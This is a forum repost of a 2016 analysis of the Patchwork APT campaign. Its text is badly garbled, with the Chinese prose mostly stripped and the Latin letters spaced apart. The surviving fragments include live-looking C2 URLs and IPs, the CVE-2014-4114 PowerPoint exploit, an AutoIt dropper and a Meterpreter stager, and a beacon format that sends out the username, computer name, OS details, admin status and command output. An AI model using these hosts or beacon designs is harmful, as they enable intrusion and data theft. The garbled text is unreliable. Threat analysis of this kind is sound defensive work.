搜索

[10290] 2016-07-11_这个APT攻击与东南亚和中国南海问题相关?

文档创建者:s7ckTeam
浏览次数:23
最后更新:2025-01-18
2016-07-11_这个APT攻击与东南亚和中国南海问题相关? A P T c l o u d s   F r e e B u f   2 0 1 6 - 0 7 - 1 1 A P T A P T   A P T 使 使   -   A P T
C y m m e t r i a A P T G i t h u b P a t c h w o r k   A P T   P a t c h w o r k P a t c h w o r k   A P T 2 0 1 5 1 2 2 5 0 0 2 0 1 4 C y m m e t r i a P a t c h w o r k   A P T P a t c h w o r k   A P T C & C P a t c h w o r k   A P T P a t c h w o r k A P T  
1   A P T 5 P P T
P P T C V E - 2 0 1 4 - 4 1 1 4   O f f i c e   P o w e r P o i n t   2 0 0 3   2 0 0 7 S a n d w o r m A P T                           A u t o I t 使 U A C M E U A C             M e t e r p r e t e r p o w e r s p l o i t   M e t e r p r e t e r m e t a s p l o i t
2   c o o k i e s V P N C y m m e t r i a s   M a z e R u n n e r   3     S M B   R D P
        R D P 4   1     P o w e r P o i n t   P P S C V E - 2 0 1 4 - 4 1 1 4 S a n d W o r m
D r i v e r . i n f   2                         s y s v o l i n f o . e x e         .                   P o w e r S h e l l     H T T P S   M e t e r p r e t e r                 , C 2 h t t p : / / 2 1 2 . 1 2 9 . 1 3 . 1 1 0 / d r o p p e r . p h p ? p r o f i l e = < b a s e 6 4 o f   [ u s e r n a m e @ c o m p u t e r n a m e ] > h t t p s : / / 4 5 . 4 3 . 1 9 2 . 1 7 2 : 8 4 4 3 / O x G N   3     M e t e r p r e t e r s s t a g e r v e r i f y s s l c e r t   S S L 4   7 z i p . e x e I P     2 1 2 . 8 3 . 1 9 1 . 1 5 6 5 7 z i p . e x e C : W i n d o w s S y s W O W 6 4 n e t v m o n . e x e 6 S M B 访 7 访 8 M a z e R u n n e r   I P R D P R D P I P   2 1 2 . 1 2 9 . 7 . 1 4 6 1 2 9 M a z e r u n n e r R D P 使 M i m i k a t z 1 0   I P r e v . p o n e y t e l e c o m . e u f      
5   C & C   C & C     P P S                     C & C P P S 2 0 1 5 1 2 2 0 1 6 1
线 P P S   C V E - 2 0 1 4 - 4 1 1 4                   W i n d o w s I N F O L E     D r i v e r . i n f
    S y s v o l i n f o . e x D R O P P E R s y s v o l i n f o . e x e u p l v 1 0 3 2   . e x e p o w e r s p l o i t M e t e r p r e t e r s y s v o l i n f o . e x e A u t o I t   i n d e t e c t a b l e s   C & C C & C C & C : C o m p u t e r I D = B A S E 6 4 E N C O D E ( $ U S E R N A M E @ $ C O M P U T E R N A M E ) d d a g e r =   I s s t a r t u p   r e g i s t r y   k e y   a d d e d   ( B o o l ) r 1 = B A S E 6 4 E N C O D E ( r e s u l t   o f   O S V e r s i o n   m a c r o ,   e . g .   W I N _ 7 ) r 2 = B A S E 6 4 E N C O D E ( r e s u l t   o f   O S A r c h   m a c r o ,   e . g .   X 6 4 ) r 3 = B A S E 6 4 E N C O D E ( t r o j a n   v e r s i o n ,   1 . 1   i n   o u r   s a m p l e ) r 4 = B A S E 6 4 E N C O D E ( D o e s   t h e   S Q L i t e   d a t a b a s e   f o l d e r   (   @ U s e r P r o f i l e D i r   & A p p D a t a L o c a l G o o g l e C h r o m e U s e r   D a t a D e f a u l t )   e x i s t   ( 1 )   o r   n o t   ( 0 ) ) r 5 = B A S E 6 4 E N C O D E ( s t d o u t   o f   l a s t   c m d   c o m m a n d ) r 6 = B A S E 6 4 E N C O D E ( 1   i f   r u n n i n g   a s   a d m i n i s t r a t o r ,   0   i f   n o t )     - -     h t t p : / / 2 1 2 . 1 2 9 . 1 3 . 1 1 0 / d r o p p e r . p h p ? p r o f i l e = +   $ C o m p u t e r I D       - -     d d a g e r ,   r 1 ,   r 2 ,   r 3 ,   r 4 ,   r 5 ,   r 6 .   - -     $ s d a t a | $ p a y l o a d T o t a l S e c u r i t y P r o g r a m   F i l e s 3 6 0   T o t a l   S e c u r i t y ( 3 6 0   T o t a l   S e c u r i t y   3 6 0 B a i d u   S o f t w a r e   U p d a t e H K E Y _ C U R R E N T _ U S E R S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n R u n * . d o c * . p d f * . c s v * . p p t
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理